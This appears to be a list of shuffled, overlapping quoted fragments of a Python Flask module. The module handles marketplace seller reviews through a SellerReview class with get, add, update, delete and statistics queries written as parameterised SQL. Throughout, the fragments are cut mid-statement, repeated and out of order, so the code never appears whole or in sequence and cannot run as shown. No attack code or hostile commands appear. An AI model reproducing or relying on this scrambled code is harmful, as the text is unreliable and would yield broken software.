"datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] rows = app.db.execute(\"\"\" UPDATE SellerReview SET",
"delete_review(seller_id): rows = app.db.execute(\"\"\" DELETE FROM SellerReview WHERE user_id = :user_id AND seller_id",
"= 'Complete' ''', buyer_id = current_user.id, seller_id = seller_id) # This means that",
"rating) VALUES(:user_id, :seller_id, :date_time, :description, :rating) RETURNING user_id \"\"\", user_id = current_user.id, seller_id",
"WHERE user_id = :user_id GROUP BY user_id ''', user_id = user_id) # If",
"that user for the given seller elif seller_id is not None: rows =",
"not the list if seller_id is None or user_id is None: return reviews",
":user_id AND seller_id = :seller_id RETURNING user_id \"\"\", user_id = current_user.id, seller_id =",
"return(SellerReview(exists = False)) @staticmethod def add_review(request, seller_id): # Add in a check to",
"def get_review_stats(user_id): rows = app.db.execute(''' SELECT user_id, COUNT(*) AS reviews, MAX(date_time) AS last_review,",
"reviews for that seller if user_id is None: rows = app.db.execute(''' SELECT user_id,",
"seller_id, offset = offset) # If no passed in `seller_id`, then return all",
"row in rows] # If no seller_id passed in, return just the first",
"SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE seller_id = :seller_id ORDER",
"''', user_id = user_id, offset = offset) # If `seller_id` passed in, then",
"SET rating = :rating, description = :description, date_time = :date_time WHERE user_id =",
"in rows] # If no seller_id passed in, return just the first element,",
"This means already a review for this seller from this user except exc.IntegrityError",
"already made a review for this seller' return 'Done' @staticmethod def update_review(request, seller_id):",
"@staticmethod def update_review(request, seller_id): # Get information to add to review date_time =",
"True) for row in rows] # If no seller_id passed in, return just",
"seller_id is None or user_id is None: return reviews else: return reviews[0] #",
"FROM SellerReview WHERE user_id = :user_id AND seller_id = :seller_id LIMIT 10 OFFSET",
"# Otherwise, create an empty SellerReview object else: return(SellerReview(exists = False)) @staticmethod def",
"return all reviews from that user elif seller_id is None: rows = app.db.execute('''",
"datetime # Reviews of Sellers # CREATE TABLE SellerReview ( # user_id INT",
"# If there exists a previous review, create the object if rows: return",
"that seller if user_id is None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time,",
"seller_id) # This means that user has not bought from this seller if",
"If no passed in `seller_id`, then return all reviews from that user elif",
"AS avg_rating FROM SellerReview WHERE user_id = :user_id GROUP BY user_id ''', user_id",
"KEY (user_id, seller_id) # FOREIGN KEY (user_id, seller_id) REFERENCES Purchases(uid, pid) # );",
"= rating, description = description, date_time = date_time, user_id = current_user.id, seller_id =",
"rating FROM SellerReview WHERE user_id = :user_id AND seller_id = :seller_id LIMIT 10",
"= :seller_id AND status = 'Complete' ''', buyer_id = current_user.id, seller_id = seller_id)",
"description, rating = rating) # This means already a review for this seller",
"kwargs.get('seller_id') self.date_time = kwargs.get('date_time') self.description = kwargs.get('description', '') self.rating = kwargs.get('rating') self.exists =",
"SELECT order_id FROM Purchases WHERE buyer_id = :buyer_id AND seller_id = :seller_id AND",
"user except exc.IntegrityError as e: return 'you have already made a review for",
"rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE user_id",
"= app.db.execute(''' SELECT user_id, COUNT(*) AS reviews, MAX(date_time) AS last_review, AVG(rating) AS avg_rating",
"NULL, # description VARCHAR(256) NOT NULL, # rating DECIMAL(10, 2) NOT NULL CHECK(rating",
"seller_id) # If there exists a previous review, create the object if rows:",
"= row[4], exists = True) for row in rows] # If no seller_id",
"in, return just the first element, not the list if seller_id is None",
"seller_id): # Get information to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description =",
"information to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating =",
"from flask_login import current_user from sqlalchemy import exc import datetime # Reviews of",
"for the given seller elif seller_id is not None: rows = app.db.execute(''' SELECT",
"just the first element, not the list if seller_id is None or user_id",
"current_user.id, seller_id = seller_id) return 'Done' @staticmethod def delete_review(seller_id): rows = app.db.execute(\"\"\" DELETE",
"user_id = current_user.id, seller_id = seller_id) # flash('Deleted product review for product ID:",
"flash('Deleted product review for product ID: ' + product_id) return 'Deleted seller review",
"offset = 0, seller_id = None): # If no passed in `user_id`, then",
":offset ''', user_id = user_id, offset = offset) # If `seller_id` passed in,",
"request.form['numstars'] rows = app.db.execute(\"\"\" UPDATE SellerReview SET rating = :rating, description = :description,",
"for row in rows][0] # Otherwise, create an empty SellerReview object else: return",
"user_id \"\"\", user_id = current_user.id, seller_id = seller_id, date_time = date_time, description =",
"SellerReview: def __init__(self, **kwargs): self.user_id = kwargs.get('user_id') self.seller_id = kwargs.get('seller_id') self.date_time = kwargs.get('date_time')",
"10 OFFSET :offset ''', user_id = user_id, offset = offset, seller_id = seller_id)",
"= user_id) # If there exists a previous review, create the object if",
"__init__(self, **kwargs): self.user_id = kwargs.get('user_id') self.seller_id = kwargs.get('seller_id') self.date_time = kwargs.get('date_time') self.description =",
"in a check to see if the user has bought from this seller",
"AND seller_id = :seller_id LIMIT 10 OFFSET :offset ''', user_id = user_id, offset",
"row[3], exists = True) for row in rows][0] # Otherwise, create an empty",
"seller_id = seller_id) # flash('Deleted product review for product ID: ' + product_id)",
"request, url_for from flask_login import current_user from sqlalchemy import exc import datetime #",
"last_review = row[2], avg_rating = row[3], exists = True) for row in rows][0]",
"= description, date_time = date_time, user_id = current_user.id, seller_id = seller_id) return 'Done'",
"row[0], seller_id = row[1], date_time = row[2], description = row[3], rating = row[4],",
"AND rating <= 5), # PRIMARY KEY (user_id, seller_id) # FOREIGN KEY (user_id,",
"1 AND rating <= 5), # PRIMARY KEY (user_id, seller_id) # FOREIGN KEY",
"of Sellers # CREATE TABLE SellerReview ( # user_id INT NOT NULL REFERENCES",
"= :user_id AND seller_id = :seller_id RETURNING user_id \"\"\", rating = rating, description",
"for seller ID: ' + seller_id @staticmethod def get_review_stats(user_id): rows = app.db.execute(''' SELECT",
"row[0], reviews = row[1], last_review = row[2], avg_rating = row[3], exists = True)",
"then return all reviews from that user elif seller_id is None: rows =",
"seller_id = seller_id) # If there exists a previous review, create the object",
"= seller_id, date_time = date_time, description = description, rating = rating) # This",
"user_id is None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM",
"purchase from this seller' # Get information to add to review date_time =",
"avg_rating FROM SellerReview WHERE user_id = :user_id GROUP BY user_id ''', user_id =",
"user_id = :user_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''', user_id",
"(user_id, seller_id) REFERENCES Purchases(uid, pid) # ); class SellerReview: def __init__(self, **kwargs): self.user_id",
"NULL CHECK(rating >= 1 AND rating <= 5), # PRIMARY KEY (user_id, seller_id)",
"= row[3], exists = True) for row in rows][0] # Otherwise, create an",
"= kwargs.get('seller_id') self.date_time = kwargs.get('date_time') self.description = kwargs.get('description', '') self.rating = kwargs.get('rating') self.exists",
"kwargs.get('exists') self.reviews = kwargs.get('reviews') self.last_review = kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating') @staticmethod def get(user_id,",
"SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE user_id = :user_id ORDER",
"RETURNING user_id \"\"\", rating = rating, description = description, date_time = date_time, user_id",
"[SellerReview(user_id = row[0], seller_id = row[1], date_time = row[2], description = row[3], rating",
"then return all reviews for that seller if user_id is None: rows =",
"return reviews[0] # Otherwise, create an empty SellerReview object else: return(SellerReview(exists = False))",
"rating <= 5), # PRIMARY KEY (user_id, seller_id) # FOREIGN KEY (user_id, seller_id)",
"FROM SellerReview WHERE user_id = :user_id ORDER BY date_time DESC LIMIT 10 OFFSET",
"seller_id = seller_id, date_time = date_time, description = description, rating = rating) #",
"user_id = user_id) # If there exists a previous review, create the object",
"exists a previous review, create the object if rows: reviews = [SellerReview(user_id =",
"' + seller_id @staticmethod def get_review_stats(user_id): rows = app.db.execute(''' SELECT user_id, COUNT(*) AS",
"rating = :rating, description = :description, date_time = :date_time WHERE user_id = :user_id",
"no seller_id passed in, return just the first element, not the list if",
"review for this seller from this user except exc.IntegrityError as e: return 'you",
"None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE",
":offset ''', user_id = user_id, offset = offset, seller_id = seller_id) # If",
"offset) # If `seller_id` passed in, then return review from that user for",
"None): # If no passed in `user_id`, then return all reviews for that",
"app.db.execute(''' SELECT user_id, COUNT(*) AS reviews, MAX(date_time) AS last_review, AVG(rating) AS avg_rating FROM",
"kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating') @staticmethod def get(user_id, offset = 0, seller_id = None):",
"# user_id INT NOT NULL REFERENCES Users(id), # seller_id INT NOT NULL REFERENCES",
"'') self.rating = kwargs.get('rating') self.exists = kwargs.get('exists') self.reviews = kwargs.get('reviews') self.last_review = kwargs.get('last_review')",
"INSERT INTO SellerReview(user_id, seller_id, date_time, description, rating) VALUES(:user_id, :seller_id, :date_time, :description, :rating) RETURNING",
":seller_id AND status = 'Complete' ''', buyer_id = current_user.id, seller_id = seller_id) #",
"user_id = :user_id AND seller_id = :seller_id RETURNING user_id \"\"\", rating = rating,",
"this seller' # Get information to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description",
"the given seller elif seller_id is not None: rows = app.db.execute(''' SELECT user_id,",
"seller_id passed in, return just the first element, not the list if seller_id",
"all reviews from that user elif seller_id is None: rows = app.db.execute(''' SELECT",
"create an empty SellerReview object else: return(SellerReview(exists = False)) @staticmethod def add_review(request, seller_id):",
"review, create the object if rows: return [SellerReview(user_id = row[0], reviews = row[1],",
"= row[3], rating = row[4], exists = True) for row in rows] #",
"seller_id, date_time, description, rating) VALUES(:user_id, :seller_id, :date_time, :description, :rating) RETURNING user_id \"\"\", user_id",
"elif seller_id is not None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description,",
"NOT NULL REFERENCES Users(id), # seller_id INT NOT NULL REFERENCES Sellers(id), # date_time",
"WHERE user_id = :user_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''',",
"passed in `seller_id`, then return all reviews from that user elif seller_id is",
"= False)) @staticmethod def add_review(request, seller_id): # Add in a check to see",
"to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] rows =",
"DELETE FROM SellerReview WHERE user_id = :user_id AND seller_id = :seller_id RETURNING user_id",
"buyer_id = current_user.id, seller_id = seller_id) # This means that user has not",
"OFFSET :offset ''', seller_id = seller_id, offset = offset) # If no passed",
"RETURNING user_id \"\"\", user_id = current_user.id, seller_id = seller_id) # flash('Deleted product review",
"exists = True) for row in rows][0] # Otherwise, create an empty SellerReview",
"description = row[3], rating = row[4], exists = True) for row in rows]",
"seller rows = app.db.execute(''' SELECT order_id FROM Purchases WHERE buyer_id = :buyer_id AND",
"= seller_id) # If there exists a previous review, create the object if",
"reviews from that user elif seller_id is None: rows = app.db.execute(''' SELECT user_id,",
":seller_id, :date_time, :description, :rating) RETURNING user_id \"\"\", user_id = current_user.id, seller_id = seller_id,",
"= [SellerReview(user_id = row[0], seller_id = row[1], date_time = row[2], description = row[3],",
"from this seller if not rows: return 'you have not had a completed",
"get(user_id, offset = 0, seller_id = None): # If no passed in `user_id`,",
"<= 5), # PRIMARY KEY (user_id, seller_id) # FOREIGN KEY (user_id, seller_id) REFERENCES",
"exc import datetime # Reviews of Sellers # CREATE TABLE SellerReview ( #",
"there exists a previous review, create the object if rows: return [SellerReview(user_id =",
"SellerReview WHERE user_id = :user_id AND seller_id = :seller_id LIMIT 10 OFFSET :offset",
"# This means that user has not bought from this seller if not",
"from this seller' # Get information to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\")",
"date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] rows = app.db.execute(\"\"\" UPDATE",
"@staticmethod def add_review(request, seller_id): # Add in a check to see if the",
":seller_id RETURNING user_id \"\"\", user_id = current_user.id, seller_id = seller_id) # flash('Deleted product",
"self.rating = kwargs.get('rating') self.exists = kwargs.get('exists') self.reviews = kwargs.get('reviews') self.last_review = kwargs.get('last_review') self.avg_rating",
"= app.db.execute(\"\"\" DELETE FROM SellerReview WHERE user_id = :user_id AND seller_id = :seller_id",
"review from that user for the given seller elif seller_id is not None:",
"WHERE seller_id = :seller_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''',",
"if the user has bought from this seller rows = app.db.execute(''' SELECT order_id",
"seller elif seller_id is not None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time,",
"seller_id INT NOT NULL REFERENCES Sellers(id), # date_time DATE NOT NULL, # description",
"# If `seller_id` passed in, then return review from that user for the",
"exists = True) for row in rows] # If no seller_id passed in,",
"seller_id, date_time, description, rating FROM SellerReview WHERE user_id = :user_id AND seller_id =",
"object if rows: reviews = [SellerReview(user_id = row[0], seller_id = row[1], date_time =",
"BY user_id ''', user_id = user_id) # If there exists a previous review,",
"FROM SellerReview WHERE seller_id = :seller_id ORDER BY date_time DESC LIMIT 10 OFFSET",
"seller ID: ' + seller_id @staticmethod def get_review_stats(user_id): rows = app.db.execute(''' SELECT user_id,",
"= current_user.id, seller_id = seller_id, date_time = date_time, description = description, rating =",
">= 1 AND rating <= 5), # PRIMARY KEY (user_id, seller_id) # FOREIGN",
"= :user_id AND seller_id = :seller_id LIMIT 10 OFFSET :offset ''', user_id =",
"rows] # If no seller_id passed in, return just the first element, not",
"SellerReview object else: return(SellerReview(exists = False)) @staticmethod def add_review(request, seller_id): # Add in",
"a previous review, create the object if rows: return [SellerReview(user_id = row[0], reviews",
"rows = app.db.execute(''' SELECT user_id, COUNT(*) AS reviews, MAX(date_time) AS last_review, AVG(rating) AS",
"previous review, create the object if rows: reviews = [SellerReview(user_id = row[0], seller_id",
"already a review for this seller from this user except exc.IntegrityError as e:",
"WHERE user_id = :user_id AND seller_id = :seller_id RETURNING user_id \"\"\", rating =",
"NOT NULL, # description VARCHAR(256) NOT NULL, # rating DECIMAL(10, 2) NOT NULL",
"not None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM SellerReview",
"# If there exists a previous review, create the object if rows: reviews",
"= row[1], date_time = row[2], description = row[3], rating = row[4], exists =",
"user has bought from this seller rows = app.db.execute(''' SELECT order_id FROM Purchases",
"= :buyer_id AND seller_id = :seller_id AND status = 'Complete' ''', buyer_id =",
"for row in rows] # If no seller_id passed in, return just the",
"not rows: return 'you have not had a completed purchase from this seller'",
"kwargs.get('user_id') self.seller_id = kwargs.get('seller_id') self.date_time = kwargs.get('date_time') self.description = kwargs.get('description', '') self.rating =",
"have not had a completed purchase from this seller' # Get information to",
"to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] try: rows",
":offset ''', seller_id = seller_id, offset = offset) # If no passed in",
"element, not the list if seller_id is None or user_id is None: return",
"= :user_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''', user_id =",
"user_id, seller_id, date_time, description, rating FROM SellerReview WHERE user_id = :user_id AND seller_id",
"= user_id, offset = offset) # If `seller_id` passed in, then return review",
"user_id \"\"\", rating = rating, description = description, date_time = date_time, user_id =",
"check to see if the user has bought from this seller rows =",
"seller if user_id is None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description,",
"def delete_review(seller_id): rows = app.db.execute(\"\"\" DELETE FROM SellerReview WHERE user_id = :user_id AND",
"seller_id, date_time = date_time, description = description, rating = rating) # This means",
"# seller_id INT NOT NULL REFERENCES Sellers(id), # date_time DATE NOT NULL, #",
"import exc import datetime # Reviews of Sellers # CREATE TABLE SellerReview (",
"OFFSET :offset ''', user_id = user_id, offset = offset) # If `seller_id` passed",
"= request.form['body'] rating = request.form['numstars'] try: rows = app.db.execute(\"\"\" INSERT INTO SellerReview(user_id, seller_id,",
"current_app as app, flash, redirect, render_template, request, url_for from flask_login import current_user from",
"= rating) # This means already a review for this seller from this",
"add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] try:",
"kwargs.get('avg_rating') @staticmethod def get(user_id, offset = 0, seller_id = None): # If no",
"# If no seller_id passed in, return just the first element, not the",
"rating = request.form['numstars'] rows = app.db.execute(\"\"\" UPDATE SellerReview SET rating = :rating, description",
"= row[1], last_review = row[2], avg_rating = row[3], exists = True) for row",
"CREATE TABLE SellerReview ( # user_id INT NOT NULL REFERENCES Users(id), # seller_id",
"self.reviews = kwargs.get('reviews') self.last_review = kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating') @staticmethod def get(user_id, offset",
"previous review, create the object if rows: return [SellerReview(user_id = row[0], reviews =",
"( # user_id INT NOT NULL REFERENCES Users(id), # seller_id INT NOT NULL",
"date_time, description = description, rating = rating) # This means already a review",
"self.description = kwargs.get('description', '') self.rating = kwargs.get('rating') self.exists = kwargs.get('exists') self.reviews = kwargs.get('reviews')",
"bought from this seller if not rows: return 'you have not had a",
"AVG(rating) AS avg_rating FROM SellerReview WHERE user_id = :user_id GROUP BY user_id ''',",
"return 'Done' @staticmethod def update_review(request, seller_id): # Get information to add to review",
"= offset) # If `seller_id` passed in, then return review from that user",
"try: rows = app.db.execute(\"\"\" INSERT INTO SellerReview(user_id, seller_id, date_time, description, rating) VALUES(:user_id, :seller_id,",
"had a completed purchase from this seller' # Get information to add to",
"the first element, not the list if seller_id is None or user_id is",
"seller_id = :seller_id RETURNING user_id \"\"\", rating = rating, description = description, date_time",
"description = request.form['body'] rating = request.form['numstars'] rows = app.db.execute(\"\"\" UPDATE SellerReview SET rating",
"user_id INT NOT NULL REFERENCES Users(id), # seller_id INT NOT NULL REFERENCES Sellers(id),",
"''', buyer_id = current_user.id, seller_id = seller_id) # This means that user has",
"# rating DECIMAL(10, 2) NOT NULL CHECK(rating >= 1 AND rating <= 5),",
"if not rows: return 'you have not had a completed purchase from this",
"request.form['body'] rating = request.form['numstars'] try: rows = app.db.execute(\"\"\" INSERT INTO SellerReview(user_id, seller_id, date_time,",
"seller_id = :seller_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''', seller_id",
"= :seller_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''', seller_id =",
"GROUP BY user_id ''', user_id = user_id) # If there exists a previous",
"= app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE user_id =",
":user_id AND seller_id = :seller_id LIMIT 10 OFFSET :offset ''', user_id = user_id,",
"user_id, COUNT(*) AS reviews, MAX(date_time) AS last_review, AVG(rating) AS avg_rating FROM SellerReview WHERE",
"# ); class SellerReview: def __init__(self, **kwargs): self.user_id = kwargs.get('user_id') self.seller_id = kwargs.get('seller_id')",
"else: return reviews[0] # Otherwise, create an empty SellerReview object else: return(SellerReview(exists =",
"offset = offset) # If no passed in `seller_id`, then return all reviews",
"user has not bought from this seller if not rows: return 'you have",
"not had a completed purchase from this seller' # Get information to add",
"NOT NULL CHECK(rating >= 1 AND rating <= 5), # PRIMARY KEY (user_id,",
"a completed purchase from this seller' # Get information to add to review",
"seller review for seller ID: ' + seller_id @staticmethod def get_review_stats(user_id): rows =",
"description, rating FROM SellerReview WHERE seller_id = :seller_id ORDER BY date_time DESC LIMIT",
"a review for this seller from this user except exc.IntegrityError as e: return",
"10 OFFSET :offset ''', seller_id = seller_id, offset = offset) # If no",
"user_id = :user_id AND seller_id = :seller_id LIMIT 10 OFFSET :offset ''', user_id",
"product_id) return 'Deleted seller review for seller ID: ' + seller_id @staticmethod def",
"import current_app as app, flash, redirect, render_template, request, url_for from flask_login import current_user",
"rating = rating) # This means already a review for this seller from",
"Sellers(id), # date_time DATE NOT NULL, # description VARCHAR(256) NOT NULL, # rating",
"user_id, seller_id, date_time, description, rating FROM SellerReview WHERE seller_id = :seller_id ORDER BY",
"from that user elif seller_id is None: rows = app.db.execute(''' SELECT user_id, seller_id,",
"is None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM SellerReview",
"''', seller_id = seller_id, offset = offset) # If no passed in `seller_id`,",
"row[1], date_time = row[2], description = row[3], rating = row[4], exists = True)",
"= :rating, description = :description, date_time = :date_time WHERE user_id = :user_id AND",
"# description VARCHAR(256) NOT NULL, # rating DECIMAL(10, 2) NOT NULL CHECK(rating >=",
"no passed in `seller_id`, then return all reviews from that user elif seller_id",
"get_review_stats(user_id): rows = app.db.execute(''' SELECT user_id, COUNT(*) AS reviews, MAX(date_time) AS last_review, AVG(rating)",
"kwargs.get('reviews') self.last_review = kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating') @staticmethod def get(user_id, offset = 0,",
"date_time = row[2], description = row[3], rating = row[4], exists = True) for",
"description = description, date_time = date_time, user_id = current_user.id, seller_id = seller_id) return",
"def add_review(request, seller_id): # Add in a check to see if the user",
"# date_time DATE NOT NULL, # description VARCHAR(256) NOT NULL, # rating DECIMAL(10,",
"+ product_id) return 'Deleted seller review for seller ID: ' + seller_id @staticmethod",
"review, create the object if rows: reviews = [SellerReview(user_id = row[0], seller_id =",
"DESC LIMIT 10 OFFSET :offset ''', seller_id = seller_id, offset = offset) #",
"= datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description = request.form['body'] rating = request.form['numstars'] rows = app.db.execute(\"\"\" UPDATE SellerReview",
"LIMIT 10 OFFSET :offset ''', seller_id = seller_id, offset = offset) # If",
"rating FROM SellerReview WHERE user_id = :user_id ORDER BY date_time DESC LIMIT 10",
"in rows][0] # Otherwise, create an empty SellerReview object else: return (SellerReview(exists =",
"Purchases WHERE buyer_id = :buyer_id AND seller_id = :seller_id AND status = 'Complete'",
"row[2], description = row[3], rating = row[4], exists = True) for row in",
"avg_rating = row[3], exists = True) for row in rows][0] # Otherwise, create",
"user for the given seller elif seller_id is not None: rows = app.db.execute('''",
"ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''', seller_id = seller_id, offset",
"user_id = user_id, offset = offset) # If `seller_id` passed in, then return",
"rows: return 'you have not had a completed purchase from this seller' #",
"from this user except exc.IntegrityError as e: return 'you have already made a",
"# Reviews of Sellers # CREATE TABLE SellerReview ( # user_id INT NOT",
"in `user_id`, then return all reviews for that seller if user_id is None:",
"= request.form['numstars'] rows = app.db.execute(\"\"\" UPDATE SellerReview SET rating = :rating, description =",
"NOT NULL, # rating DECIMAL(10, 2) NOT NULL CHECK(rating >= 1 AND rating",
"for this seller from this user except exc.IntegrityError as e: return 'you have",
":rating, description = :description, date_time = :date_time WHERE user_id = :user_id AND seller_id",
"return review from that user for the given seller elif seller_id is not",
"rows = app.db.execute(\"\"\" DELETE FROM SellerReview WHERE user_id = :user_id AND seller_id =",
"the user has bought from this seller rows = app.db.execute(''' SELECT order_id FROM",
"= offset) # If no passed in `seller_id`, then return all reviews from",
"LIMIT 10 OFFSET :offset ''', user_id = user_id, offset = offset) # If",
"date_time, description, rating FROM SellerReview WHERE user_id = :user_id AND seller_id = :seller_id",
"seller_id is None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM",
"= :seller_id LIMIT 10 OFFSET :offset ''', user_id = user_id, offset = offset,",
"app.db.execute(''' SELECT order_id FROM Purchases WHERE buyer_id = :buyer_id AND seller_id = :seller_id",
"`seller_id` passed in, then return review from that user for the given seller",
"exc.IntegrityError as e: return 'you have already made a review for this seller'",
"there exists a previous review, create the object if rows: reviews = [SellerReview(user_id",
"from this seller rows = app.db.execute(''' SELECT order_id FROM Purchases WHERE buyer_id =",
"seller_id = row[1], date_time = row[2], description = row[3], rating = row[4], exists",
"except exc.IntegrityError as e: return 'you have already made a review for this",
"description = request.form['body'] rating = request.form['numstars'] try: rows = app.db.execute(\"\"\" INSERT INTO SellerReview(user_id,",
"empty SellerReview object else: return(SellerReview(exists = False)) @staticmethod def add_review(request, seller_id): # Add",
"10 OFFSET :offset ''', user_id = user_id, offset = offset) # If `seller_id`",
"this seller' return 'Done' @staticmethod def update_review(request, seller_id): # Get information to add",
"= True) for row in rows][0] # Otherwise, create an empty SellerReview object",
":date_time, :description, :rating) RETURNING user_id \"\"\", user_id = current_user.id, seller_id = seller_id, date_time",
"as e: return 'you have already made a review for this seller' return",
"from flask import current_app as app, flash, redirect, render_template, request, url_for from flask_login",
"= kwargs.get('reviews') self.last_review = kwargs.get('last_review') self.avg_rating = kwargs.get('avg_rating') @staticmethod def get(user_id, offset =",
"rows: return [SellerReview(user_id = row[0], reviews = row[1], last_review = row[2], avg_rating =",
"flash, redirect, render_template, request, url_for from flask_login import current_user from sqlalchemy import exc",
"WHERE buyer_id = :buyer_id AND seller_id = :seller_id AND status = 'Complete' ''',",
"AS last_review, AVG(rating) AS avg_rating FROM SellerReview WHERE user_id = :user_id GROUP BY",
"app.db.execute(\"\"\" INSERT INTO SellerReview(user_id, seller_id, date_time, description, rating) VALUES(:user_id, :seller_id, :date_time, :description, :rating)",
"app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE user_id = :user_id",
"SellerReview WHERE user_id = :user_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset",
"= row[2], avg_rating = row[3], exists = True) for row in rows][0] #",
"FROM SellerReview WHERE user_id = :user_id AND seller_id = :seller_id RETURNING user_id \"\"\",",
"If there exists a previous review, create the object if rows: reviews =",
"import current_user from sqlalchemy import exc import datetime # Reviews of Sellers #",
"offset = offset, seller_id = seller_id) # If there exists a previous review,",
"current_user.id, seller_id = seller_id) # This means that user has not bought from",
"SellerReview SET rating = :rating, description = :description, date_time = :date_time WHERE user_id",
"2) NOT NULL CHECK(rating >= 1 AND rating <= 5), # PRIMARY KEY",
"return all reviews for that seller if user_id is None: rows = app.db.execute('''",
"DECIMAL(10, 2) NOT NULL CHECK(rating >= 1 AND rating <= 5), # PRIMARY",
"as app, flash, redirect, render_template, request, url_for from flask_login import current_user from sqlalchemy",
"update_review(request, seller_id): # Get information to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description",
"= :seller_id RETURNING user_id \"\"\", rating = rating, description = description, date_time =",
"AND seller_id = :seller_id AND status = 'Complete' ''', buyer_id = current_user.id, seller_id",
"= row[0], reviews = row[1], last_review = row[2], avg_rating = row[3], exists =",
"reviews else: return reviews[0] # Otherwise, create an empty SellerReview object else: return(SellerReview(exists",
"app.db.execute(\"\"\" UPDATE SellerReview SET rating = :rating, description = :description, date_time = :date_time",
"date_time DATE NOT NULL, # description VARCHAR(256) NOT NULL, # rating DECIMAL(10, 2)",
"INT NOT NULL REFERENCES Users(id), # seller_id INT NOT NULL REFERENCES Sellers(id), #",
":user_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''', user_id = user_id,",
"Users(id), # seller_id INT NOT NULL REFERENCES Sellers(id), # date_time DATE NOT NULL,",
"in, then return review from that user for the given seller elif seller_id",
"# flash('Deleted product review for product ID: ' + product_id) return 'Deleted seller",
"means that user has not bought from this seller if not rows: return",
"seller_id, date_time, description, rating FROM SellerReview WHERE user_id = :user_id ORDER BY date_time",
"seller' # Get information to add to review date_time = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%SZ\") description =",
"MAX(date_time) AS last_review, AVG(rating) AS avg_rating FROM SellerReview WHERE user_id = :user_id GROUP",
"seller if not rows: return 'you have not had a completed purchase from",
"user_id = user_id, offset = offset, seller_id = seller_id) # If there exists",
"\"\"\", user_id = current_user.id, seller_id = seller_id, date_time = date_time, description = description,",
"= description, rating = rating) # This means already a review for this",
"row[2], avg_rating = row[3], exists = True) for row in rows][0] # Otherwise,",
"user_id = current_user.id, seller_id = seller_id) return 'Done' @staticmethod def delete_review(seller_id): rows =",
"FOREIGN KEY (user_id, seller_id) REFERENCES Purchases(uid, pid) # ); class SellerReview: def __init__(self,",
"passed in, then return review from that user for the given seller elif",
"NULL REFERENCES Users(id), # seller_id INT NOT NULL REFERENCES Sellers(id), # date_time DATE",
"self.seller_id = kwargs.get('seller_id') self.date_time = kwargs.get('date_time') self.description = kwargs.get('description', '') self.rating = kwargs.get('rating')",
"INTO SellerReview(user_id, seller_id, date_time, description, rating) VALUES(:user_id, :seller_id, :date_time, :description, :rating) RETURNING user_id",
"# FOREIGN KEY (user_id, seller_id) REFERENCES Purchases(uid, pid) # ); class SellerReview: def",
"\"\"\", rating = rating, description = description, date_time = date_time, user_id = current_user.id,",
"= current_user.id, seller_id = seller_id) return 'Done' @staticmethod def delete_review(seller_id): rows = app.db.execute(\"\"\"",
"or user_id is None: return reviews else: return reviews[0] # Otherwise, create an",
"WHERE user_id = :user_id AND seller_id = :seller_id RETURNING user_id \"\"\", user_id =",
"elif seller_id is None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating",
"object if rows: return [SellerReview(user_id = row[0], reviews = row[1], last_review = row[2],",
"= :user_id GROUP BY user_id ''', user_id = user_id) # If there exists",
"seller_id): # Add in a check to see if the user has bought",
"app.db.execute(''' SELECT user_id, seller_id, date_time, description, rating FROM SellerReview WHERE seller_id = :seller_id",
"KEY (user_id, seller_id) REFERENCES Purchases(uid, pid) # ); class SellerReview: def __init__(self, **kwargs):",
"has not bought from this seller if not rows: return 'you have not",
"flask import current_app as app, flash, redirect, render_template, request, url_for from flask_login import",
"0, seller_id = None): # If no passed in `user_id`, then return all",
"`user_id`, then return all reviews for that seller if user_id is None: rows",
":seller_id ORDER BY date_time DESC LIMIT 10 OFFSET :offset ''', seller_id = seller_id,",
"= app.db.execute(''' SELECT order_id FROM Purchases WHERE buyer_id = :buyer_id AND seller_id =",
"that user elif seller_id is None: rows = app.db.execute(''' SELECT user_id, seller_id, date_time,",
